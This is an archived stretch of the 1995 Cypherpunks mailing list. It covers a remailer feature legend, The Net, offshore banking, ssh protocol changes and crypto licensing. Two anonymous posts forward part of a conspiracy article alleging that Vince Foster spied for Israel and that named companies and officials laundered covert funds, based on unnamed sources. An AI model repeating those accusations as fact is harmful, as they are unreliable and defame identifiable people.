     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 04:21:21 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v02120d01ac426b1b8c6d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:59 AM 7/31/95, Bill Stewart wrote:
>So good for her.  I've spent most of the evening chatting on cypherpunks and
>cyberia
>rather than writing code....  Some recent survey found that 60% of time that
>average folks spend on the net is communications rather than information
>retrieval.

I believe I wasn't clear. My point was that Ms. Bullock lives in AOL chat
rooms and thinks it's the internet.

Most of my time on the net is spent communicating (albiet badly) also.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 07:57:21 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507310635.XAA25441@ix9.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950731074836.14305B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 30 Jul 1995, Bill Stewart wrote:

> Aren't there some banks or similar companies that are world-wide,
> but have US branches?  I think SwissBankCorp or somebody like that
> has an office in San Francisco; would it be possible for you to transfer
> money to someone with an account there who's really in, say, Switzerland
> or the UK or Hong Kong?

Foreign representative offices have very limited powers under US
banking law.  In addition, they have to be as forthcoming with
US authorities as do US banks.  There is no greater privacy with
them than with US banks doing the same sorts of transfers.  They
do make it a little easier to open Swiss or other offshore bank
accounts because they can handle the identity verification stuff
here, so you don't have to go there.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 08:15:44 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: The Net (short movie review)
In-Reply-To: <199507310856.BAA09839@ix7.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950731075728.14305C-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Bill Stewart wrote:

> I rather enjoyed the movie, though I did share the experience of being
> one of the two or three people in the theater laughing at various technical 
> gaffes and/or in-jokes.  Obviously, you can't take anything from Hollywood too
> seriously technically, but they did look at a few social issues related to
> computerisation, such as the isolation, computer addiction, lack of face-to-face
> relationships, difficulty in knowing what's real when everything's on the
> computer,
> vulnerability of society to computer problems, trustability of people who
> tell you
> that you can trust their computer security system for everything - even the 
> government uses it!   So they didn't look into them too deeply - they're
> Hollywood.

Got to agree with Bill here.  Book, TV, movie, etc. stories are
not about "what" they are about "what if."  For our purposes, it
was sufficient that THE NET plausibly created distrust in 
solutions provided by monolithic big brothers.  A lot of elements
echoed arguments about Clipper, this Alltel conspiracy stuff,
secret back doors, manufactured justifications for government
mandated or endorsed security programs, etc.  Of course the
nominal enemy was an evil corporation, but it, could certainly 
be read as something more.  The "Praetorians" are taken right 
of history, and can only be interpreted as a governmental group.

I hope the movie is very popular.  It helps us by inducing 
healthy cynicism with a dash of paranoia.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thresher!thad@netcom.com (Thaddeus J. Beier)
Date: Mon, 31 Jul 95 09:24:29 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507311602.JAA01170@thresher>
MIME-Version: 1.0
Content-Type: text/plain



Hadmut,

There has been an ongoing debate about this, for several years.  The way
that it is supposed to work is that the TV broadcasters would include
some kind of rating information in the vertical interval between frames,
and the TV's that are sold after a certain date would interpret these
rating signals to darken the screen during shots, or more likely, programs
that are deemed inappropriate to the viewer.  The idea would be that
parents could program their tv's to permit some range of sex and/or
violence, and thus could protect their children somewhat.

The chip that interprets the content does it solely based on the rating
information.  This is the so-called "v-chip" (v for violence, I think,
not for video) that you see in the press.

I think that a more reasonable approach would be to sell a box that
sits between the video signal source and the TV, or that is within
the TV, that is connected to some private rating service.  I think
that any kind of mandated rating would be unlikely to meet the
qualifications of most people.  Besides, what I would really
like to filter out, what I find to be incredibly violent to the
minds of children, is commercial advertising.  Private rating
services could take care of these, easily, as well.

The idea of boxes outside the TV is usually casually shot down
as unworkable; that kids, with their infinite time, patience,
cleverness, and guile, will find a way to bypass the box.
I'd say that it's worth a try.  And, if it will blank
commercials (and pause your VCR during them, say) I think
it will have tremendous revenues to enable research into
a secure solution.  One such secure solution would be that
you would take your TV into a shop, and have the antenna
connection modified, so that any tampering would be
detected.  Or have it done as a house call, whatever.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 09:00:19 PDT
To: cypherpunks@toad.com
Subject: Ivy Bells, Smersh, and the Rosenbergs
Message-ID: <ac424ae9050210049fd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 AM 7/31/95, Bill Stewart wrote:
>At 12:52 AM 7/31/95 -0700, rick hoselton wrote:
>>
>>>Different cases - the Walkers gave away information on how the Yankees were
>>>stealing Russian secrets, which the Russians patched up by encrypting.
>>
>>Really?  Do you have a reference for this?  I am interested.
>No refs, this is just memory of the news.  There was an undersea cable
>north of Siberia somewhere that carried a lot of unencrypted military
>traffic, which US Submarines were eavesdropping on.  I think Walker was
>the one who leaked it, and they started encrypting.  Refs on the Walkers
>should be easy to find in the library; there were a couple of books.

There were at least 3 books, plus at least one t.v. miniseries, plus
extensive media coverage. Until the Aldrich Ames case, this was about the
most serious spying case in modern times. (It may or may not have been
bigger than Ames, depending on the relative importance of "technical means"
vs. "humint.")

The undersea cable eavesdropping program was "Ivy Bells," and was revealed
to the Sovs by Walker and his associates. I don't know if they also knew
about via alternate sources.

On the other issue, whether either or both of the Rosenbergs were spies,
things have settled yet. Sudoplatov, in "Special Tasks," claims they were
both spies. Others doubt it.

(For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to
spies." Yes, it really existed, unlike, say "U.N.C.L.E.")

On the issue of whether in the 1950s the U.S. government knew the
Rosenbergs were spies, we have even less information. A trial was held and
guilty verdict returned, but reasonable folks may disagree. My guess? Yes,
they were probably spies.

The Rosenbergs were certainly the Mumia Abu Jamals of their day.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 31 Jul 95 06:40:21 PDT
To: cypherpunks@toad.com
Subject: Re: "Codebreakers" on PBS
In-Reply-To: <199507310932.CAA27798@netcom9.netcom.com>
Message-ID: <0au49c1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


bart@netcom.com (Harry Bartholomew) writes:

>     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
>     "The World War II codebreaking efforts known as Enigma and Purple"

If this is the rerun of the show Nova had in march 94, then I highly
recommend it.  I taped it and showed it to the undergrad class on computer
security I taught that semester.  The kids loved it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 09:40:18 PDT
To: Mike Bailey <bailey@computek.net>
Subject: OFFSHORE BANKING (Re: Zimmermann legal fund)
In-Reply-To: <Pine.SUN.3.91.950731100140.4105A-100000@bambam.computek.net>
Message-ID: <Pine.SUN.3.91.950731091836.5894C-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Mike Bailey wrote:

> I open an account with U.S. $$ in a foreign bank who uses francs ... a month 
> later the franc loses 20 % of it's value as compared to the U.S. dollar. If I 
> close out my account would I not lose 20% of my money because when the money was 
> deposited it was credited to the account in francs ... and when it is withdrawn 
> it converted back to $$ at the current conversion rate ?

If the account is denominated in francs, you take the hit.  If
it is denominated in dollars, you don't.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephane Bortzmeyer <bortzmeyer@cnam.fr>
Date: Mon, 31 Jul 95 00:38:17 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: ssh protocol
In-Reply-To: <199507231145.OAA04620@shadows.cs.hut.fi>
Message-ID: <199507310737.JAA06792@cnam.fr>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday 23 July 95, at 14 h 45, the keyboard of Tatu Ylonen <ylo@cs.hut.fi> wrote:

> People have also suggested using the Photuris protocol that is part of
> the IP Security work being done at IETF
> (ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt
).
> 
> The basic idea behind the protocol goes roughly like this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange (the
>      signature can be with any of a number of algorithms; RSA and
>      Elliptic Curve systems have been defined).
> 
> If this were adapted to ssh, the protocol would look roughly like
> this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange by its
>      host key
>   3. RSA and Rhosts authentication requests would include a signature
>      by the requesting key.
> 
> This would get rid of the server key and the need to regenerate it,
> because the diffie-hellman exchange already prevents decrypting old
> conversations.  The challenge-dialogs could be avoided (unless they
> are needed for performance reasons to avoid unnecessary signature
> computations).
> 
> One could also eliminate RSA in future and start using some other
> public key cryptosystem if desired.  The Diffie-Hellman patent and the
> generic public key patent expire in 1997; the RSA-patent does not
> expire until about year 2000.
> 
> 
> Anyway, this would be a major change that probably cannot easily be
> made compatibly.  Maybe an incompatible ssh-2.x?  Anyway, I don't want
> to rush into making major changes in the protocol.
> 
> I would very much like to hear comments on this approach.
> 
>     Tatu

Stephane Bortzmeyer           Conservatoire National des Arts et Metiers
bortzmeyer@cnam.fr            Laboratoire d'Informatique
                              292, rue Saint-Martin			
tel: +33 (1) 40 27 27 31      75141 Paris Cedex 03
fax: +33 (1) 40 27 27 72      France	

"C'est la nuit qu'il est beau de croire a la lumiere." E. Rostand




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@CIC.Net>
Date: Mon, 31 Jul 95 06:48:30 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: building libraries
In-Reply-To: <199507310521.WAA08413@ix4.ix.netcom.com>
Message-ID: <199507311348.JAA04346@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon Jul 31 01:25:04 1995: you scribbled...
> 
> At 08:40 PM 7/28/95 -0400, Alex Tang wrote:
> >> The answer is to have some non-USA entity build shareable full fledged 
> >> full powered crypto libraries and provide them for free for the rest of 
> >> the world and for all machines.
> >Wouldn't there still be licensing issues to deal with (in the states at
> >least)??  I'm sure RSA would claim that the package would be in violation
> >of the licensing...
> 
> If you did everything in an RSAREF-compatible manner, that would help;
> I think somebody outside the US has written an RSAREF-clone.
> Some problems include building programs that have generic-callout hooks
> instead of crypto-specific hooks (so that they don't get bitten by ITAR),
> while still maintaining reasonable efficiency and convenience.

Yeah, this would work for everyone except commercial institutions within
the states.  They'd have to get a license agreement for RSA.

...alex...

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)
Unofficial SSL/HTTPD FAQ: http://petrified.cic.net/~altitude/ssl/ssl.saga.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 31 Jul 95 00:49:57 PDT
To: cypherpunks@toad.com
Subject: Why Vince Foster Was Killed
Message-ID: <199507310749.JAA12241@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
From: QDQD56A@prodigy.com (Ct Buskuhl)
Newsgroups: alt.current-events.clinton.whitewater
Subject: Fostergate Reprint
Date: 31 Jul 1995 05:40:06 GMT

James Norman is the Senior Editor for the highly respected FORBES 
magazine. Several months ago, he wrote an article about the death of 
Vince Foster, called "Fostergate." 

  This article was set to run and was pulled at the last minute by forces 
that are unknown at this time. You may recall a similar situation with 
the Washington Post spiking the Mena story at the last minute - despite 
their own lawyers clearing it to run. The Mena story ended up in this 
month's Penthouse magazine of all places. Fortunately Mr. Norman's 
article found a more respectable home - at Media Bypass!
  Media Bypass will feature this article in their August issue. I 
certainly owe them a little plug for posting this in advance. You may 
subscribe to it by calling 1-800-4-BYPASS. 
  The article is as follows:

FOSTERGATE
by James R. Norman

"Was White House Deputy Counsel Vince Foster selling US secrets to Israel?
 The CIA suspects he was."

  TWO weeks before his death on July 20, 1993, White House Deputy Counsel 
Vincent W. Foster went into a deep funk. The official cause of death, 
given by former Independent Counsel Robert Fiske Jr. (who was later 
replaced by Kenneth Starr), was suicide driven by depression over, among 
other things, several newspaper editorials. But Vince Foster had a much 
bigger and darker reason to be seriously burned out. He had just learned 
he was under investigation for espionage.
  Outrageous? To say the least. But a lengthy investigation has located 
over a dozen sources with connections to the intelligence community who 
confirm a shocking story of money laundering and espionage connected to 
the highest levels of the White House. Without grants of immunity, the 
sources risk going to prison for violation of the National Security Act. 
Virtually all have demanded anonymity.
  According to a veteran Central Intelligence Agency operative close to 
the Foster investigation, Foster's first indication of trouble came when 
he inquired about his coded bank account at Banca Della Svizzera Italiana 
in Chiasso, Switzerland and found the account empty. Foster was shocked 
to learn from the bank that someone using his secret authorization code 
had withdrawn all $2.73 million he had stashed there and had moved it to, 
of all places, the U.S. Treasury.
  Then, according to credit card records reviewed by a private 
investigator who has revealed them, Foster canceled the two-day round-
trip TWA and Swiss Air plane tickets to Geneva he had purchased on his 
American Express card through the White House travel office on July 1. 
  Discretely he began asking what was afoot, says the CIA source, 
confirming that someone in the White House tipped him off. It was bad 
news. The CIA had Foster under serious investigation for leaking high-
security secrets to the State of Israel.
  For months, a small cadre of CIA computer hackers known as the Fifth 
Column, armed with a Cray supercomputer, had been monitoring Foster's 
Swiss account. They had located it by tracking money flows from various 
Israeli government accounts after finding Foster's name while secretly 
snooping through the electronic files of Israel's Mossad. Then by 
snooping through the bank files, they gathered all the information needed 
to withdraw the money. 
  Foster was just one of the first of scores of high level U.S. political 
figures to thus have their secret Swiss accounts looted of illicit funds, 
according to both this veteran CIA source and a separate source in 
another intelligence agency. Over the past two years, they say, more than 
$2 billion has been swept out of offshore bank accounts belonging to 
figures connected to the U.S. government with nary a peep from the 
victims or their banks. The claim that Foster and other U.S. figures have 
had offshore accounts has been confirmed by a separate high-ranking CIA 
source and another in the Department of Justice. 
  Various sources, some of them controversial, have contributed other 
pieces to this puzzle. Whatever their motivations, those sources have 
proven remarkably consistent. Their stories jibe well with known facts 
and offer a most plausible explanation for Foster's mysterious depression.
 It would also explain Washington's determined effort to dismiss the 
Foster affair as a tragic but simple suicide.
  Vince Foster a spy? Actually, it is much worse than that, if the CIA's 
suspicions are confirmed by the ongoing foreign counterintelligence probe.
 He would have been an invaluable double agent with potential access to 
not only high-level political information, but also to sensitive code, 
encryption and data transmission secrets, the stuff by which modern war 
is won or lost. That is because for many years, according to nine 
separate current and former U.S. law enforcement or intelligence 
officials, Foster had been a behind-the-scenes manager of a key support 
company in one of the biggest, most secretive spy efforts on record, the 
silent surveillance of banking transactions both here and abroad.
  This bank snooping effort began in earnest soon after Ronald Reagan 
became president in 1981. Its primary aim was to track the money behind 
international terrorist groups and soon came to be dubbed, "Follow the 
money", according to the originator of the program Norman A. Bailey. Now 
a private Washington consultant on international banking, Bailey was an 
economist and Reagan advisor on the National Security Counsel. It was 
Bailey's idea to begin using powerful new computer and electronic 
eavesdropping technologies then emerging to let the intelligence 
community monitor the previously confidential flow of bank wire transfers.
 This was no small task; more than $1 trillion a day moves through New 
York alone.
  Bailey, himself constrained by the National Security Act, claims he 
doesn't know exactly how the data was collected. But he confirms that 
within a few years (of 1981) The National Security Agency (NSA), the 
signals intelligence arm of the government, had begun vacuuming up 
mountains of data by listening in on bank wire traffic. It became a joint 
effort of several Western governments with the Israelis playing a leading 
role, since they were the main targets of terrorism.
  Other intelligence experts say the flow of bits and bytes was captured 
by various means; from simply tapping phone lines to implanting 
customized chips in bank computers to store up and periodically "burst-
transmit" data to a passing van, or low-flying "sig-int" or signals 
intelligence satellite. Another part of the problem was to get the 
world's banks to standardize their data so that it could be easily 
analyzed. And that brings up to PROMIS, a powerful tracking tracking 
software developed for the U.S. Government and then further enhanced by a 
little company called Inslaw Inc.
  PROMIS stands for Prosecutor's Management Information Systems and was 
designed to manage legal cases. In 1982, just as Bailey's follow-the-
money effort was gaining steam, the Reagan Justice Department eagerly 
snapped up Inslaw's newest version of PROMIS. But the government refused 
to pay the $6 million owed for it, claiming part of the contract was not 
fulfilled. Inslaw, forced into Chapter 11 reorganization, and nearly 
driven to quick liquidation by the government and its former partner AT&T,
 hotly denied that claim. Ultimately, a bankruptcy judge ruled the 
government stole the PROMIS software by "trickery, fraud and deceit."
  Why PROMIS? Because it was adaptable. Besides tracking legal cases, it 
could be easily customized to track anything from computer chip design to 
complex monetary transactions. It was especially useful for tracking 
criminals or just plain political dissidents. Inslaw claims the software 
was eventually illegally sold to as many as 50 countries for use by their 
police, military or intelligence agencies, including such bloody regimes 
as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). 
Profits on these sales, Inslaw claims, went mainly into the private 
pockets of Republican political cronies in the 1980s, including Reagan 
confident Barl Brain, former part-owner of UPI and FNN.
  Among the biggest profiteers on PROMIS, according to the 1992 book by 
former Israeli anti-terrorism staffer Ari Ben-Menaseche, was former 
British publisher Bob Maxwell. On behalf of the Israelis, Maxwell 
aggressively marketed a doctored version of PROMIS equipped with one or 
more "back doors" to allow an outsider to tap into the user's data base 
without leaving an audit trail. In fact, it may have been such rigged 
programs that allowed noted Israeli spy Jonathon Pollard, from his 
computer terminal at the Office of Naval Intelligence in Washington, to 
download vast amounts of top secret U.S. nuclear weapons and code data in 
the mid-1980s.
  According to a heavily-redacted New Mexico FBI counterintelligence 
report, Maxwell was apparently allowed to sell two copies of PROMIS back 
to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims 
was a hugely inflated price of $87 million. That would have allowed 
Pollard, if he was using the rigged program, to obtain U.S. missile 
targeting data long before Israel had its own satellite capability, thus 
making it a real nuclear threat to the Soviet Union. Pollard was 
convicted of espionage and sentenced in 1986 to life imprisonment. U.S. 
officials have vehemently opposed efforts to gain his early release.
  Maxwell, according to Ben-Menaseche and nine other sources, was also 
selling pirated versions of PROMIS to major world banks for use in their 
wire transfer rooms to track the blizzard of numbers, authorization codes 
and confirmations required on each wire transaction. Don't expect any 
banks to admit running PROMIS software. They probably now know it was 
pilfered. But they readily took it both because it was the best tracking 
software available at the time and because the U.S. government was 
tacitly leaning on them to go along with the surveillance effort or face 
regulatory reprisals or prosecution on money laundering charges. With the 
widespread adoption of PROMIS, the data became standardized and much 
easier to analyze by the NSA.
  It took some effort to install and support PROMIS in the banking 
industry. That's where Vince Foster came in. Sources say that since at 
least the late 1970s, Foster had been a silent, behind-the-scenes 
overseer on behalf of the NSA for a small Little Rock, Ark., bank data 
processing company. Its name was Systematics Inc., launched in 1967 and 
funded and controlled for most of its life by Arkansas billionaire 
Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. 
Foster was one of Stephens' trusted deal makers at the Rose Law Firm, 
where he was partner with Hillary Rodham Clinton, Webster Hubbell and 
William Kennedy (whose father was a Systematics director). Hubbell also 
played an overseer role at Systematics for the NSA for some years 
according to intelligence sources.
  Systematics has had close ties to the NSA and CIA ever since its 
founding, sources say, as a money-shuffler for covert operations. It is 
no secret that there were billions of dollars moving around in "black" 
accounts - from buying and selling arms to the Contras, Iran, Iraq, 
Angola, and other countries to paying CIA operatives and laundering money 
from clandestine CIA drug dealing (such as at Mena, Arkansas). Having 
taken over the computer rooms in scores of small U.S. banks as an "out-
sourced" supplier of data processing, Systematics was in a unique 
position to manage that covert money flow. Sources say the money was 
moved at the end of every day disguised as a routine bank-to-bank 
balancing transaction, out of view of bank regulators and even the banks 
themselves. In short, it became cyber-money.
  One man who uncovered the link between Systematics, Foster and covert 
money movements from arms and drugs was Bob Bickel, who was an undercover 
Customs investigator in the 1980s. "We found Systematics was often a 
conduit for the funds" in arms and drug transactions, says Bickel, now 
living in Texas: "They were the money changers." His story is 
corroborated by a former CIA employee who says it was well known within 
the agency in the late 1970s that Foster was involved with Systematics in 
covert money management.
  Another source is Michael Ricoposciuto, former research director of the 
covert arms operation at California's tiny Cabazon Indian Reservation in 
the early 1980s. Ricoposciuto claims his crew of computer programmers 
helped customize PROMIS there for banking and other uses. He is now 
serving 80 years in a South Carolina federal prison ostensibly on drug 
charges. Though maybe not a credible source on his own, his story fits 
well with other sources.
  Systematics' money-laundering role for the intelligence community might 
help explain why Jackson Stephens tried to take over Washington-based 
Financial General Bankshares in 1978 on behalf of Arab backers of the 
Bank of Credit and Commerce International (BCCI). BCCI's links to global 
corruption and intelligence operations has been well documented, though 
many mysteries remain.
  According to a lawsuit filed by the Securities and Exchange Commission, 
Stephens insisted on having then-tiny Systematics brought in to take over 
all of FGB's data processing. Representing Systematics in that 1978 SEC 
case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in 
that takeover. But FGB, later renamed First American, ultimately fell 
under the alleged domination of BCCI through Robert Altman and former 
Defense Secretary Clark Clifford. According to a technician who worked 
for First American in Atlanta, Systematics became a key computer 
contractor there anyway.
  In the 1980s, Systematics' business boomed. When it first sold stock to 
the public in 1983, revenues were $64 million. That had risen to $230 
million by the time Stephens arranged Systematics' sale to Alltel Corp., 
a telephone holding company which then moved its headquarters to Little 
Rock. Last year, Systematics sales hit $861 million - a third of Alltel's 
total. Stephens now owns more than 8 percent of Alltel and wields 
significant influence over the company.
  When Bill Clinton was elected president in 1992, bringing Foster, 
Hubbell and Kennedy to the White House staff, Systematics' foreign bank 
business flourished. It began to announce a flood of data processing 
deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, 
Trinidad and elsewhere. According to veteran bank software vendors, and 
computer intelligence specialist Wayne Madsen, co-author of a book about 
the NSA called "The Puzzle Palace", it is inconceivable any U.S. company 
could land such lucrative work without the intimate participation of the 
NSA. Domestic business took off as well, with giants like Citibank and 
Nations Bank signing big data processing deals.
  Working alongside Systematics in this spooky world of bank computer 
spying appears to be a cluster of other curious, loosely-affiliated 
companies. For instance, there is Boston Systematics, headed by former 
CIA officer Harry Wechsler, who controls two Israeli companies that also 
use the name Systematics. Wechsler denies any connection to the Arkansas 
company (now named Alltel Information Services) and claims to know 
nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 
1987 from Wechter's Israeli company seeking marketing data on PROMIS.
  Many of the intelligence sources who provided information for this 
story insist that Boston Systematics and the Arkansas company are, in 
fact, related in some way. And based on his own source in the Justice 
Department, Inslaw's founder William A. Hamilton says he believes Boston 
Systematics was also closely linked with both Maxwell and Rafl Bitan, the 
former head of Israel's anti-terrorism effort. Hamilton says Bitan, using 
a false name, showed up at Inslaw's Washington, DC office one day in 1983 
for a private demonstration of PROMIS.
  Another curious company is Arkansas Systems, founded in 1974 by 
Systematics employee and formerly U.S. Army "analyst" John Chamberlain, 
located just down the road from Systematics. Arkansas Systems specializes 
in computer systems for foreign wire transfer centers and central banks. 
Among its clients: Russia and China, according to Arkansas Systems 
president James K. Hendren, a physicist formerly involved with the 
Safeguard anti-missile system. Arkansas Systems was one of the first 
companies to receive funding from the Arkansas Development Finance 
Authority (ADFA), an agency created by Bill Clinton that is now coming 
under Congressional scrutiny.
  What does Alltel have to say about all of this? "I've never heard 
anything so asinine in all my life," steams Joe T. Ford, Alltel's 
chairman and the father of Jack Stephen's chief administrative aide.
  John Stouri, a former IBM executive who is chief executive of Alltel 
Information Services, says he had never heard of Boston Systematics 
before this inquiry. He declares that the Arkansas company does almost no 
work for the government, scoffs at the idea his company is tied to the 
NSA and says Foster has never had any connection to Systematics. As for 
the fact he sold half his 700,000 Alltel shares in February at $34, just 
before it began skidding to under $24, he says that was merely to pay for 
the exercise of options.
  Why is it then that Hamilton claims sources in two separate 
intelligence agencies say documents relating to Systematics were among 
those taken from Foster's office immediately after Foster's death? Indeed,
 a private investigator close to the continuing "Whitewater" probe by 
Independent Counsel Kenneth W. Starr says he has learned that Hubbell has 
delivered those documents - including papers related to Systematics - to 
Starr. Hubbell pleaded guilty last December to two felony counts related 
to over-billing at the Rose Law Firm and has been sentenced to 21 months 
in prison.
  If Foster knew the U.S. was spying on foreign banks, why would he let 
himself be caught red-handed with a Swiss bank account? The answer may be 
that the Israeli transactions were, in fact, well concealed, according to 
the veteran CIA source. And Foster would have known that, unless a prober 
knew exactly what to look for, finding his payoffs in the torrent of 
routine wire transfer data would be a hopeless task. Besides that, greed 
could explain a lot, if not Foster's then for whomever else he might have 
been playing bagman. The CIA source says Foster was not the only one in 
the White House under suspicion for peddling state secrets.
  All of which helps explain Foster's odd behavior before his death. He 
was a tough, smart trial attorney at the peak of power in Washington. 
Only 48 years old, he was in excellent health. Suddenly, according to the 
Fiske report, he couldn't sleep. He complained of heart palpitations and 
high blood pressure. His sister arranged for him to see a Washington 
psychiatrist, who later told the FBI he had been instructed not to take 
notes because Foster's depression was "directly related to highly 
sensitive and confidential matters" tied to his "top secret" government 
work.
  Foster never saw a shrink. Instead, about a week before he died, he 
hired a lawyer: high-powered DC criminal attorney and political fix-it 
man James Hamilton. Foster's wife claims his reason was the White House 
Travel Office controversy, which was expected to lead to congressional 
hearings.
  On the weekend of July 17 and 18, Foster drove with his wife to the 
eastern shore of Maryland to relax. By "coincidence", according to the 
Fiske report, so did Hubbell. They met at the posh estate of Michael 
Cardozo, head of Clinton's legal defense fund and son-in-law of prominent 
Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend 
was a laid-back gathering of tennis and poolside chit-chat.
  But according to sources connected to the CIA, Justice Department and 
another intelligence agency, the meeting was under surveillance. The 
agenda? Heavy duty damage control. Foster was grilled. To whom else could 
the Swiss money be traced? How could the scandal be contained?


Sorry. File too long. Maybe someone else can post rest. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 31 Jul 95 01:00:31 PDT
To: cypherpunks@toad.com
Subject: Why Vince Foster Was Killed
Message-ID: <199507310800.KAA12393@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
